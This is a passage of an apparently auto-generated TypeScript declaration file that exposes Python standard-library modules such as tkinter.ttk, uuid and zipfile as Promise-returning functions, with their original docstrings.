Promise<any>\n\n\t\t\t/**\n\t\t\t * Query or modify the options for the specified item.\n\t\t\t * \n\t\t\t * If no options are given, a dict with options/values for the item\n\t\t\t * is returned. If option is specified then the value for that option\n\t\t\t * is returned. Otherwise, sets the options to the corresponding\n\t\t\t * values as given by kw.\n\t\t\t */\n\t\t\titem(item, option?): Promise<any>\n\t\t\titem$({ item, option }: { item, option?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Moves item to position index in parent's list of children.\n\t\t\t * \n\t\t\t * It is illegal to move an item under one of its descendants. If\n\t\t\t * index is less than or equal to zero, item is moved to the\n\t\t\t * beginning, if greater than or equal to the number of children,\n\t\t\t * it is moved to the end. If item was detached it is reattached.\n\t\t\t */\n\t\t\tmove(item, parent, index): Promise<any>\n\t\t\tmove$({ item, parent, index }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the identifier of item's next sibling, or '' if item\n\t\t\t * is the last child of its parent.\n\t\t\t */\n\t\t\tnext(item): Promise<any>\n\t\t\tnext$({ item }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the ID of the parent of item, or '' if item is at the\n\t\t\t * top level of the hierarchy.\n\t\t\t */\n\t\t\tparent(item): Promise<any>\n\t\t\tparent$({ item }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the identifier of item's previous sibling, or '' if\n\t\t\t * item is the first child of its parent.\n\t\t\t */\n\t\t\tprev(item): Promise<any>\n\t\t\tprev$({ item }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Ensure that item is visible.\n\t\t\t * \n\t\t\t * Sets all of item's ancestors open option to True, and scrolls\n\t\t\t * the widget if necessary so that item is within the visible\n\t\t\t * portion of the tree.\n\t\t\t */\n\t\t\tsee(item): Promise<any>\n\t\t\tsee$({ item }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the tuple of selected items.\n\t\t\t */\n\t\t\tselection(): Promise<any>\n\t\t\tselection$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * The specified items becomes the new selection.\n\t\t\t */\n\t\t\tselection_set(): Promise<any>\n\t\t\tselection_set$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Add all of the specified items to the selection.\n\t\t\t */\n\t\t\tselection_add(): Promise<any>\n\t\t\tselection_add$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Remove all of the specified items from the selection.\n\t\t\t */\n\t\t\tselection_remove(): Promise<any>\n\t\t\tselection_remove$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Toggle the selection state of each specified item.\n\t\t\t */\n\t\t\tselection_toggle(): Promise<any>\n\t\t\tselection_toggle$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Query or set the value of given item.\n\t\t\t * \n\t\t\t * With one argument, return a dictionary of column/value pairs\n\t\t\t * for the specified item. With two arguments, return the current\n\t\t\t * value of the specified column. With three arguments, set the\n\t\t\t * value of given column in given item to the specified value.\n\t\t\t */\n\t\t\tset(item, column?, value?): Promise<any>\n\t\t\tset$({ item, column, value }: { item, column?, value?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Bind a callback for the given event sequence to the tag tagname.\n\t\t\t * When an event is delivered to an item, the callbacks for each\n\t\t\t * of the item's tags option are called.\n\t\t\t */\n\t\t\ttag_bind(tagname, sequence?, callback?): Promise<any>\n\t\t\ttag_bind$({ tagname, sequence, callback }: { tagname, sequence?, callback?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Query or modify the options for the specified tagname.\n\t\t\t * \n\t\t\t * If kw is not given, returns a dict of the option settings for tagname.\n\t\t\t * If option is specified, returns the value for that option for the\n\t\t\t * specified tagname. Otherwise, sets the options to the corresponding\n\t\t\t * values for the given tagname.\n\t\t\t */\n\t\t\ttag_configure(tagname, option?): Promise<any>\n\t\t\ttag_configure$({ tagname, option }: { tagname, option?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * If item is specified, returns 1 or 0 depending on whether the\n\t\t\t * specified item has the given tagname. Otherwise, returns a list of\n\t\t\t * all items which have the specified tag.\n\t\t\t * \n\t\t\t * * Availability: Tk 8.6\n\t\t\t */\n\t\t\ttag_has(tagname, item?): Promise<any>\n\t\t\ttag_has$({ tagname, item }: { tagname, item?}): Promise<any>\n\t\t\treattach\n\t\t}\n\n\t\t/**\n\t\t * A Ttk Scale widget with a Ttk Label widget indicating its\n\t\t * current value.\n\t\t * \n\t\t * The Ttk Scale can be accessed through instance.scale, and Ttk Label\n\t\t * can be accessed through instance.label\n\t\t */\n\n\t\t/**\n\t\t * Construct a horizontal LabeledScale with parent master, a\n\t\t * variable to be associated with the Ttk Scale widget and its range.\n\t\t * If variable is not specified, a tkinter.IntVar is created.\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * compound: 'top' or 'bottom'\n\t\t * Specifies how to display the label relative to the scale.\n\t\t * Defaults to 'top'.\n\t\t * \n\t\t */\n\t\tfunction LabeledScale(master?, variable?, from_?, to?): Promise<ILabeledScale>\n\t\tfunction LabeledScale$({ master, variable, from_, to }: { master?, variable?, from_?, to?}): Promise<ILabeledScale>\n\t\tinterface ILabeledScale extends IFrame {\n\n\t\t\t/**\n\t\t\t * Destroy this widget and possibly its associated variable.\n\t\t\t */\n\t\t\tdestroy(): Promise<any>\n\t\t\tdestroy$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Return current scale value.\n\t\t\t */\n\t\t\tvalue(): Promise<any>\n\t\t\tvalue$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Set new scale value.\n\t\t\t */\n\t\t\tvalue(val): Promise<any>\n\t\t\tvalue$({ val }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Themed OptionMenu, based after tkinter's OptionMenu, which allows\n\t\t * the user to select a value from a menu.\n\t\t */\n\n\t\t/**\n\t\t * Construct a themed OptionMenu widget with master as the parent,\n\t\t * the resource textvariable set to variable, the initially selected\n\t\t * value specified by the default parameter, the menu values given by\n\t\t * *values and additional keywords.\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * style: stylename\n\t\t * Menubutton style.\n\t\t * direction: 'above', 'below', 'left', 'right', or 'flush'\n\t\t * Menubutton direction.\n\t\t * command: callback\n\t\t * A callback that will be invoked after selecting an item.\n\t\t * \n\t\t */\n\t\tfunction OptionMenu(master, variable, def?): Promise<IOptionMenu>\n\t\tfunction OptionMenu$({ master, variable, def }: { master, variable, def?}): Promise<IOptionMenu>\n\t\tinterface IOptionMenu extends IMenubutton {\n\n\t\t\t/**\n\t\t\t * Build a new menu of radiobuttons with *values and optionally\n\t\t\t * a default value.\n\t\t\t */\n\t\t\tset_menu(def?): Promise<any>\n\t\t\tset_menu$({ def }: { def?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Destroy this widget and its associated variable.\n\t\t\t */\n\t\t\tdestroy(): Promise<any>\n\t\t\tdestroy$($: {}): Promise<any>\n\t\t}\n\t\tlet LabelFrame: Promise<any>\n\t\tlet PanedWindow: Promise<any>\n\t}\n}\ndeclare module turtledemo {\n\tmodule chaos {\n\t\tvar _\n\t\tfunction f(x): Promise<any>\n\t\tfunction f$({ x }): Promise<any>\n\t\tfunction g(x): Promise<any>\n\t\tfunction g$({ x }): Promise<any>\n\t\tfunction h(x): Promise<any>\n\t\tfunction h$({ x }): Promise<any>\n\t\tfunction jumpto(x, y): Promise<any>\n\t\tfunction jumpto$({ x, y }): Promise<any>\n\t\tfunction line(x1, y1, x2, y2): Promise<any>\n\t\tfunction line$({ x1, y1, x2, y2 }): Promise<any>\n\t\tfunction coosys(): Promise<any>\n\t\tfunction coosys$($: {}): Promise<any>\n\t\tfunction plot(fun, start, color): Promise<any>\n\t\tfunction plot$({ fun, start, color }): Promise<any>\n\t\tfunction main(): Promise<any>\n\t\tfunction main$($: {}): Promise<any>\n\t\tlet N: Promise<any>\n\t}\n}\ndeclare module uuid {\n\tvar _\n\n\t/**\n\t * Get the hardware address as a 48-bit positive integer.\n\t * \n\t * The first time this runs, it may launch a separate program, which could\n\t * be quite slow. If all attempts to obtain the hardware address fail, we\n\t * choose a random 48-bit number with its eighth bit set to 1 as recommended\n\t * in RFC 4122.\n\t * \n\t */\n\tfunction getnode(): Promise<any>\n\tfunction getnode$($: {}): Promise<any>\n\n\t/**\n\t * Generate a UUID from a host ID, sequence number, and the current time.\n\t * If 'node' is not given, getnode() is used to obtain the hardware\n\t * address. If 'clock_seq' is given, it is used as the sequence number;\n\t * otherwise a random 14-bit sequence number is chosen.\n\t */\n\tfunction uuid1(node?, clock_seq?): Promise<any>\n\tfunction uuid1$({ node, clock_seq }: { node?, clock_seq?}): Promise<any>\n\n\t/**\n\t * Generate a UUID from the MD5 hash of a namespace UUID and a name.\n\t */\n\tfunction uuid3(namespace, name): Promise<any>\n\tfunction uuid3$({ namespace, name }): Promise<any>\n\n\t/**\n\t * Generate a random UUID.\n\t */\n\tfunction uuid4(): Promise<any>\n\tfunction uuid4$($: {}): Promise<any>\n\n\t/**\n\t * Generate a UUID from the SHA-1 hash of a namespace UUID and a name.\n\t */\n\tfunction uuid5(namespace, name): Promise<any>\n\tfunction uuid5$({ namespace, name }): Promise<any>\n\tinterface ISafeUUID {\n\t\tsafe\n\t\tunsafe\n\t\tunknown\n\t}\n\n\t/**\n\t * Instances of the UUID class represent UUIDs as specified in RFC 4122.\n\t * UUID objects are immutable, hashable, and usable as dictionary keys.\n\t * Converting a UUID to a string with str() yields something in the form\n\t * '12345678-1234-1234-1234-123456789abc'. The UUID constructor accepts\n\t * five possible forms: a similar string of hexadecimal digits, or a tuple\n\t * of six integer fields (with 32-bit, 16-bit, 16-bit, 8-bit, 8-bit, and\n\t * 48-bit values respectively) as an argument named 'fields', or a string\n\t * of 16 bytes (with all the integer fields in big-endian order) as an\n\t * argument named 'bytes', or a string of 16 bytes (with the first three\n\t * fields in little-endian order) as an argument named 'bytes_le', or a\n\t * single 128-bit integer as an argument named 'int'.\n\t * \n\t * UUIDs have these read-only attributes:\n\t * \n\t * bytes the UUID as a 16-byte string (containing the six\n\t * integer fields in big-endian byte order)\n\t * \n\t * bytes_le the UUID as a 16-byte string (with time_low, time_mid,\n\t * and time_hi_version in little-endian byte order)\n\t * \n\t * fields a tuple of the six integer fields of the UUID,\n\t * which are also available as six individual attributes\n\t * and two derived attributes:\n\t * \n\t * time_low the first 32 bits of the UUID\n\t * time_mid the next 16 bits of the UUID\n\t * time_hi_version the next 16 bits of the UUID\n\t * clock_seq_hi_variant the next 8 bits of the UUID\n\t * clock_seq_low the next 8 bits of the UUID\n\t * node the last 48 bits of the UUID\n\t * \n\t * time the 60-bit timestamp\n\t * clock_seq the 14-bit sequence number\n\t * \n\t * hex the UUID as a 32-character hexadecimal string\n\t * \n\t * int the UUID as a 128-bit integer\n\t * \n\t * urn the UUID as a URN as specified in RFC 4122\n\t * \n\t * variant the UUID variant (one of the constants RESERVED_NCS,\n\t * RFC_4122, RESERVED_MICROSOFT, or RESERVED_FUTURE)\n\t * \n\t * version the UUID version number (1 through 5, meaningful only\n\t * when the variant is RFC_4122)\n\t * \n\t * is_safe An enum indicating whether the UUID has been generated in\n\t * a way that is safe for multiprocessing applications, via\n\t * uuid_generate_time_safe(3).\n\t * \n\t */\n\n\t/**\n\t * Create a UUID from either a string of 32 hexadecimal digits,\n\t * a string of 16 bytes as the 'bytes' argument, a string of 16 bytes\n\t * in little-endian order as the 'bytes_le' argument, a tuple of six\n\t * integers (32-bit time_low, 16-bit time_mid, 16-bit time_hi_version,\n\t * 8-bit clock_seq_hi_variant, 8-bit clock_seq_low, 48-bit node) as\n\t * the 'fields' argument, or a single 128-bit integer as the 'int'\n\t * argument. When a string of hex digits is given, curly braces,\n\t * hyphens, and a URN prefix are all optional. For example, these\n\t * expressions all yield the same UUID:\n\t * \n\t * UUID('{12345678-1234-5678-1234-567812345678}')\n\t * UUID('12345678123456781234567812345678')\n\t * UUID('urn:uuid:12345678-1234-5678-1234-567812345678')\n\t * UUID(bytes='\\x12\\x34\\x56\\x78'*4)\n\t * UUID(bytes_le='\\x78\\x56\\x34\\x12\\x34\\x12\\x78\\x56' +\n\t * '\\x12\\x34\\x56\\x78\\x12\\x34\\x56\\x78')\n\t * UUID(fields=(0x12345678, 0x1234, 0x5678, 0x12, 0x34, 0x567812345678))\n\t * UUID(int=0x12345678123456781234567812345678)\n\t * \n\t * Exactly one of 'hex', 'bytes', 'bytes_le', 'fields', or 'int' must\n\t * be given. The 'version' argument is optional; if given, the resulting\n\t * UUID will have its variant and version set according to RFC 4122,\n\t * overriding the given 'hex', 'bytes', 'bytes_le', 'fields', or 'int'.\n\t * \n\t * is_safe is an enum exposed as an attribute on the instance. It\n\t * indicates whether the UUID has been generated in a way that is safe\n\t * for multiprocessing applications, via uuid_generate_time_safe(3).\n\t * \n\t */\n\tfunction UUID(hex?, bytes?, bytes_le?, fields?, int?, version?): Promise<IUUID>\n\tfunction UUID$({ hex, bytes, bytes_le, fields, int, version }: { hex?, bytes?, bytes_le?, fields?, int?, version?}): Promise<IUUID>\n\tinterface IUUID {\n\t\tbytes(): Promise<any>\n\t\tbytes$($: {}): Promise<any>\n\t\tbytes_le(): Promise<any>\n\t\tbytes_le$($: {}): Promise<any>\n\t\tfields(): Promise<any>\n\t\tfields$($: {}): Promise<any>\n\t\ttime_low(): Promise<any>\n\t\ttime_low$($: {}): Promise<any>\n\t\ttime_mid(): Promise<any>\n\t\ttime_mid$($: {}): Promise<any>\n\t\ttime_hi_version(): Promise<any>\n\t\ttime_hi_version$($: {}): Promise<any>\n\t\tclock_seq_hi_variant(): Promise<any>\n\t\tclock_seq_hi_variant$($: {}): Promise<any>\n\t\tclock_seq_low(): Promise<any>\n\t\tclock_seq_low$($: {}): Promise<any>\n\t\ttime(): Promise<any>\n\t\ttime$($: {}): Promise<any>\n\t\tclock_seq(): Promise<any>\n\t\tclock_seq$($: {}): Promise<any>\n\t\tnode(): Promise<any>\n\t\tnode$($: {}): Promise<any>\n\t\thex(): Promise<any>\n\t\thex$($: {}): Promise<any>\n\t\turn(): Promise<any>\n\t\turn$($: {}): Promise<any>\n\t\tvariant(): Promise<any>\n\t\tvariant$($: {}): Promise<any>\n\t\tversion(): Promise<any>\n\t\tversion$($: {}): Promise<any>\n\t}\n\tlet int_: Promise<any>\n\tlet bytes_: Promise<any>\n\tlet NAMESPACE_DNS: Promise<any>\n\tlet NAMESPACE_URL: Promise<any>\n\tlet NAMESPACE_OID: Promise<any>\n\tlet NAMESPACE_X500: Promise<any>\n}\ndeclare module zipfile {\n\tvar _\n\n\t/**\n\t * Quickly see if a file is a ZIP file by checking the magic number.\n\t * \n\t * The filename argument may be a file or file-like object too.\n\t * \n\t */\n\tfunction is_zipfile(filename): Promise<any>\n\tfunction is_zipfile$({ filename }): Promise<any>\n\tfunction main(args?): Promise<any>\n\tfunction main$({ args }: { args?}): Promise<any>\n\tinterface IBadZipFile {\n\t}\n\n\t/**\n\t * \n\t * Raised when writing a zipfile, the zipfile requires ZIP64 extensions\n\t * and those extensions are disabled.\n\t * \n\t */\n\tinterface ILargeZipFile {\n\t}\n\n\t/**\n\t * Class with attributes describing each file in the ZIP archive.\n\t */\n\tfunction ZipInfo(filename?, date_time?): Promise<IZipInfo>\n\tfunction ZipInfo$({ filename, date_time }: { filename?, date_time?}): Promise<IZipInfo>\n\tinterface IZipInfo {\n\n\t\t/**\n\t\t * Return the per-file header as a bytes object.\n\t\t */\n\t\tFileHeader(zip64?): Promise<any>\n\t\tFileHeader$({ zip64 }: { zip64?}): Promise<any>\n\n\t\t/**\n\t\t * Construct an appropriate ZipInfo for a file on the filesystem.\n\t\t * \n\t\t * filename should be the path to a file or directory on the filesystem.\n\t\t * \n\t\t * arcname is the name which it will have within the archive (by default,\n\t\t * this will be the same as filename, but without a drive letter and with\n\t\t * leading path separators removed).\n\t\t * \n\t\t */\n\t\tfrom_file(filename, arcname?): Promise<any>\n\t\tfrom_file$({ filename, arcname }: { filename, arcname?}): Promise<any>\n\n\t\t/**\n\t\t * Return True if this archive member is a directory.\n\t\t */\n\t\tis_dir(): Promise<any>\n\t\tis_dir$($: {}): Promise<any>\n\t}\n\tfunction LZMACompressor(): Promise<ILZMACompressor>\n\tfunction LZMACompressor$({ }): Promise<ILZMACompressor>\n\tinterface ILZMACompressor {\n\t\tcompress(data): Promise<any>\n\t\tcompress$({ data }): Promise<any>\n\t\tflush(): Promise<any>\n\t\tflush$($: {}): Promise<any>\n\t}\n\tfunction LZMADecompressor(): Promise<ILZMADecompressor>\n\tfunction LZMADecompressor$({ }): Promise<ILZMADecompressor>\n\tinterface ILZMADecompressor {\n\t\tdecompress(data): Promise<any>\n\t\tdecompress$({ data }): Promise<any>\n\t}\n\tinterface I_SharedFile {\n\t\tseek(offset, whence?): Promise<any>\n\t\tseek$({ offset, whence }: { offset, whence?}): Promise<any>\n\t\tread(n?): Promise<any>\n\t\tread$({ n }: { n?}): Promise<any>\n\t\tclose(): Promise<any>\n\t\tclose$($: {}): Promise<any>\n\t}\n\tinterface I_Tellable {\n\t\twrite(data): Promise<any>\n\t\twrite$({ data }): Promise<any>\n\t\ttell(): Promise<any>\n\t\ttell$($: {}): Promise<any>\n\t\tflush(): Promise<any>\n\t\tflush$($: {}): Promise<any>\n\t\tclose(): Promise<any>\n\t\tclose$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * File-like object for reading an archive member.\n\t * Is returned by ZipFile.open().\n\t * \n\t */\n\tfunction ZipExtFile(fileobj, mode, zipinfo, pwd?, close_fileobj?: boolean): Promise<IZipExtFile>\n\tfunction ZipExtFile$({ fileobj, mode, zipinfo, pwd, close_fileobj }: { fileobj, mode, zipinfo, pwd?, close_fileobj?}): Promise<IZipExtFile>\n\tinterface IZipExtFile {\n\n\t\t/**\n\t\t * Read and return a line from the stream.\n\t\t * \n\t\t * If limit is specified, at most limit bytes will be read.\n\t\t * \n\t\t */\n\t\treadline(limit?): Promise<any>\n\t\treadline$({ limit }: { limit?}): Promise<any>\n\n\t\t/**\n\t\t * Returns buffered bytes without advancing the position.\n\t\t */\n\t\tpeek(n?): Promise<any>\n\t\tpeek$({ n }: { n?}): Promise<any>\n\t\treadable(): Promise<any>\n\t\treadable$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Read and return up to n bytes.\n\t\t * If the argument is omitted, None, or negative, data is read and returned until EOF is reached.\n\t\t * \n\t\t */\n\t\tread(n?): Promise<any>\n\t\tread$({ n }: { n?}): Promise<any>\n\n\t\t/**\n\t\t * Read up to n bytes with at most one read() system call.\n\t\t */\n\t\tread1(n): Promise<any>\n\t\tread1$({ n }): Promise<any>\n\t\tclose(): Promise<any>\n\t\tclose$($: {}): Promise<any>\n\t\tseekable(): Promise<any>\n\t\tseekable$($: {}): Promise<any>\n\t\tseek(offset, whence?): Promise<any>\n\t\tseek$({ offset, whence }: { offset, whence?}): Promise<any>\n\t\ttell(): Promise<any>\n\t\ttell$($: {}): Promise<any>\n\t\tMAX_N\n\t\tMIN_READ_SIZE\n\t\tMAX_SEEK_READ\n\t}\n\tinterface I_ZipWriteFile {\n\t\twritable(): Promise<any>\n\t\twritable$($: {}): Promise<any>\n\t\twrite(data): Promise<any>\n\t\twrite$({ data }): Promise<any>\n\t\tclose(): Promise<any>\n\t\tclose$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Class with methods to open, read, write, close, list zip files.\n\t * \n\t * z = ZipFile(file, mode=\"r\", compression=ZIP_STORED, allowZip64=True,\n\t * compresslevel=None)\n\t * \n\t * file: Either the path to the file, or a file-like object.\n\t * If it is a path, the file will be opened and closed by ZipFile.\n\t * mode: The mode can be either read 'r', write 'w', exclusive create 'x',\n\t * or append 'a'.\n\t * compression: ZIP_STORED (no compression), ZIP_DEFLATED (requires zlib),\n\t * ZIP_BZIP2 (requires bz2) or ZIP_LZMA (requires lzma).\n\t * allowZip64: if True ZipFile will create files with ZIP64 extensions when\n\t * needed, otherwise it will raise an exception when this would\n\t * be necessary.\n\t * compresslevel: None (default for the given compression type) or an integer\n\t * specifying the level to pass to the compressor.\n\t * When using ZIP_STORED or ZIP_LZMA this keyword has no effect.\n\t * When using ZIP_DEFLATED integers 0 through 9 are accepted.\n\t * When using ZIP_BZIP2 integers 1 through 9 are accepted.\n\t * \n\t * \n\t */\n\n\t/**\n\t * Open the ZIP file with mode read 'r', write 'w', exclusive create 'x',\n\t * or append 'a'.\n\t */\n\tfunction ZipFile(file, mode?, compression?, allowZip64?: boolean, compresslevel?): Promise<IZipFile>\n\tfunction ZipFile$({ file, mode, compression, allowZip64, compresslevel }: { file, mode?, compression?, allowZip64?, compresslevel?}): Promise<IZipFile>\n\tinterface IZipFile {\n\n\t\t/**\n\t\t * Return a list of file names in the archive.\n\t\t */\n\t\tnamelist(): Promise<any>\n\t\tnamelist$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return a list of class ZipInfo instances for files in the\n\t\t * archive.\n\t\t */\n\t\tinfolist(): Promise<any>\n\t\tinfolist$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Print a table of contents for the zip file.\n\t\t */\n\t\tprintdir(file?): Promise<any>\n\t\tprintdir$({ file }: { file?}): Promise<any>\n\n\t\t/**\n\t\t * Read all the files and check the CRC.\n\t\t */\n\t\ttestzip(): Promise<any>\n\t\ttestzip$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the instance of ZipInfo given 'name'.\n\t\t */\n\t\tgetinfo(name): Promise<any>\n\t\tgetinfo$({ name }): Promise<any>\n\n\t\t/**\n\t\t * Set default password for encrypted files.\n\t\t */\n\t\tsetpassword(pwd): Promise<any>\n\t\tsetpassword$({ pwd }): Promise<any>\n\n\t\t/**\n\t\t * The comment text associated with the ZIP file.\n\t\t */\n\t\tcomment(): Promise<any>\n\t\tcomment$($: {}): Promise<any>\n\t\tcomment(comment): Promise<any>\n\t\tcomment$({ comment }): Promise<any>\n\n\t\t/**\n\t\t * Return file bytes for name.\n\t\t */\n\t\tread(name, pwd?): Promise<any>\n\t\tread$({ name, pwd }: { name, pwd?}): Promise<any>\n\n\t\t/**\n\t\t * Return file-like object for 'name'.\n\t\t * \n\t\t * name is a string for the file name within the ZIP file, or a ZipInfo\n\t\t * object.\n\t\t * \n\t\t * mode should be 'r' to read a file already in the ZIP file, or 'w' to\n\t\t * write to a file newly added to the archive.\n\t\t * \n\t\t * pwd is the password to decrypt files (only used for reading).\n\t\t * \n\t\t * When writing, if the file size is not known in advance but may exceed\n\t\t * 2 GiB, pass force_zip64 to use the ZIP64 format, which can handle large\n\t\t * files. If the size is known in advance, it is best to pass a ZipInfo\n\t\t * instance for name, with zinfo.file_size set.\n\t\t * \n\t\t */\n\t\topen(name, mode?, pwd?): Promise<any>\n\t\topen$({ name, mode, pwd }: { name, mode?, pwd?}): Promise<any>\n\n\t\t/**\n\t\t * Extract a member from the archive to the current working directory,\n\t\t * using its full name. Its file information is extracted as accurately\n\t\t * as possible. `member' may be a filename or a ZipInfo object. You can\n\t\t * specify a different directory using `path'.\n\t\t * \n\t\t */\n\t\textract(member, path?, pwd?): Promise<any>\n\t\textract$({ member, path, pwd }: { member, path?, pwd?}): Promise<any>\n\n\t\t/**\n\t\t * Extract all members from the archive to the current working\n\t\t * directory. `path' specifies a different directory to extract to.\n\t\t * `members' is optional and must be a subset of the list returned\n\t\t * by namelist().\n\t\t * \n\t\t */\n\t\textractall(path?, members?, pwd?): Promise<any>\n\t\textractall$({ path, members, pwd }: { path?, members?, pwd?}): Promise<any>\n\n\t\t/**\n\t\t * Put the bytes from filename into the archive under the name\n\t\t * arcname.\n\t\t */\n\t\twrite(filename, arcname?, compress_type?, compresslevel?): Promise<any>\n\t\twrite$({ filename, arcname, compress_type, compresslevel }: { filename, arcname?, compress_type?, compresslevel?}): Promise<any>\n\n\t\t/**\n\t\t * Write a file into the archive. The contents is 'data', which\n\t\t * may be either a 'str' or a 'bytes' instance; if it is a 'str',\n\t\t * it is encoded as UTF-8 first.\n\t\t * 'zinfo_or_arcname' is either a ZipInfo instance or\n\t\t * the name of the file in the archive.\n\t\t */\n\t\twritestr(zinfo_or_arcname, data, compress_type?, compresslevel?): Promise<any>\n\t\twritestr$({ zinfo_or_arcname, data, compress_type, compresslevel }: { zinfo_or_arcname, data, compress_type?, compresslevel?}): Promise<any>\n\n\t\t/**\n\t\t * Close the file, and for mode 'w', 'x' and 'a' write the ending\n\t\t * records.\n\t\t */\n\t\tclose(): Promise<any>\n\t\tclose$($: {}): Promise<any>\n\t\tfp\n\t}\n\n\t/**\n\t * Class to create ZIP archives with Python library files and packages.\n\t */\n\tfunction PyZipFile(file, mode?, compression?, allowZip64?: boolean, optimize?): Promise<IPyZipFile>\n\tfunction PyZipFile$({ file, mode, compression, allowZip64, optimize }: { file, mode?, compression?, allowZip64?, optimize?}): Promise<IPyZipFile>\n\tinterface IPyZipFile extends IZipFile {\n\n\t\t/**\n\t\t * Add all files from \"pathname\" to the ZIP archive.\n\t\t * \n\t\t * If pathname is a package directory, search the directory and\n\t\t * all package subdirectories recursively for all *.py and enter\n\t\t * the modules into the archive. If pathname is a plain\n\t\t * directory, listdir *.py and enter all modules. Else, pathname\n\t\t * must be a Python *.py file and the module will be put into the\n\t\t * archive. Added modules are always module.pyc.\n\t\t * This method will compile the module.py into module.pyc if\n\t\t * necessary.\n\t\t * If filterfunc(pathname) is given, it is called with every argument.\n\t\t * When it is False, the file or directory is skipped.\n\t\t * \n\t\t */\n\t\twritepy(pathname, basename?, filterfunc?): Promise<any>\n\t\twritepy$({ pathname, basename, filterfunc }: { pathname, basename?, filterfunc?}): Promise<any>\n\t}\n\n\t/**\n\t * \n\t * A ZipFile subclass that ensures that implied directories\n\t * are always included in the namelist.\n\t * \n\t */\n\tinterface ICompleteDirs extends IZipFile {\n\t\tnamelist(): Promise<any>\n\t\tnamelist$($: {}): Promise<any>\n\n\t\t/**\n\t\t * \n\t\t * If the name represents a directory, return that name\n\t\t * as a directory (with the trailing slash).\n\t\t * \n\t\t */\n\t\tresolve_dir(name): Promise<any>\n\t\tresolve_dir$({ name }): Promise<any>\n\n\t\t/**\n\t\t * \n\t\t * Given a source (filename or zipfile), return an\n\t\t * appropriate CompleteDirs subclass.\n\t\t * \n\t\t */\n\t\tmake(source): Promise<any>\n\t\tmake$({ source }): Promise<any>\n\t}\n\n\t/**\n\t * \n\t * ZipFile subclass to ensure implicit\n\t * dirs exist and are resolved rapidly.\n\t * \n\t */\n\tinterface IFastLookup extends ICompleteDirs {\n\t\tnamelist(): Promise<any>\n\t\tnamelist$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * \n\t * A pathlib-compatible interface for zip files.\n\t * \n\t * Consider a zip file with this structure::\n\t * \n\t * .\n\t * ├── a.txt\n\t * └── b\n\t * ├── c.txt\n\t * └── d\n\t * └── e.txt\n\t * \n\t * >>> data = io.BytesIO()\n\t * >>> zf = ZipFile(data, 'w')\n\t * >>> zf.writestr('a.txt', 'content of a')\n\t * >>> zf.writestr('b/c.txt', 'content of c')\n\t * >>> zf.writestr('b/d/e.txt', 'content of e')\n\t * >>> zf.filename = 'mem/abcde.zip'\n\t * \n\t * Path accepts the zipfile object itself or a filename\n\t * \n\t * >>> root = Path(zf)\n\t * \n\t * From there, several path operations are available.\n\t * \n\t * Directory iteration (including the zip file itself):\n\t * \n\t * >>> a, b = root.iterdir()\n\t * >>> a\n\t * Path('mem/abcde.zip', 'a.txt')\n\t * >>> b\n\t * Path('mem/abcde.zip', 'b/')\n\t * \n\t * name property:\n\t * \n\t * >>> b.name\n\t * 'b'\n\t * \n\t * join with divide operator:\n\t * \n\t * >>> c = b / 'c.txt'\n\t * >>> c\n\t * Path('mem/abcde.zip', 'b/c.txt')\n\t * >>> c.name\n\t * 'c.txt'\n\t * \n\t * Read text:\n\t * \n\t * >>> c.read_text()\n\t * 'content of c'\n\t * \n\t * existence:\n\t * \n\t * >>> c.exists()\n\t * True\n\t * >>> (b / 'missing.txt').exists()\n\t * False\n\t * \n\t * Coercion to string:\n\t * \n\t * >>> import os\n\t * >>> str(c).replace(os.sep, posixpath.sep)\n\t * 'mem/abcde.zip/b/c.txt'\n\t * \n\t * At the root, ``name``, ``filename``, and ``parent``\n\t * resolve to the zipfile. Note these attributes are not\n\t * valid and will raise a ``ValueError`` if the zipfile\n\t * has no filename.\n\t * \n\t * >>> root.name\n\t * 'abcde.zip'\n\t * >>> str(root.filename).replace(os.sep, posixpath.sep)\n\t * 'mem/abcde.zip'\n\t * >>> str(root.parent)\n\t * 'mem'\n\t * \n\t */\n\n\t/**\n\t * \n\t * Construct a Path from a ZipFile or filename.\n\t * \n\t * Note: When the source is an existing ZipFile object,\n\t * its type (__class__) will be mutated to a\n\t * specialized type. If the caller wishes to retain the\n\t * original type, the caller should either create a\n\t * separate ZipFile object or pass a filename.\n\t * \n\t */\n\tfunction Path(root, at?): Promise<IPath>\n\tfunction Path$({ root, at }: { root, at?}): Promise<IPath>\n\tinterface IPath {\n\n\t\t/**\n\t\t * \n\t\t * Open this entry as text or binary following the semantics\n\t\t * of ``pathlib.Path.open()`` by passing arguments through\n\t\t * to io.TextIOWrapper().\n\t\t * \n\t\t */\n\t\topen(mode?): Promise<any>\n\t\topen$({ mode }: { mode?}): Promise<any>\n\t\tname(): Promise<any>\n\t\tname$($: {}): Promise<any>\n\t\tsuffix(): Promise<any>\n\t\tsuffix$($: {}): Promise<any>\n\t\tsuffixes(): Promise<any>\n\t\tsuffixes$($: {}): Promise<any>\n\t\tstem(): Promise<any>\n\t\tstem$($: {}): Promise<any>\n\t\tfilename(): Promise<any>\n\t\tfilename$($: {}): Promise<any>\n\t\tread_text(): 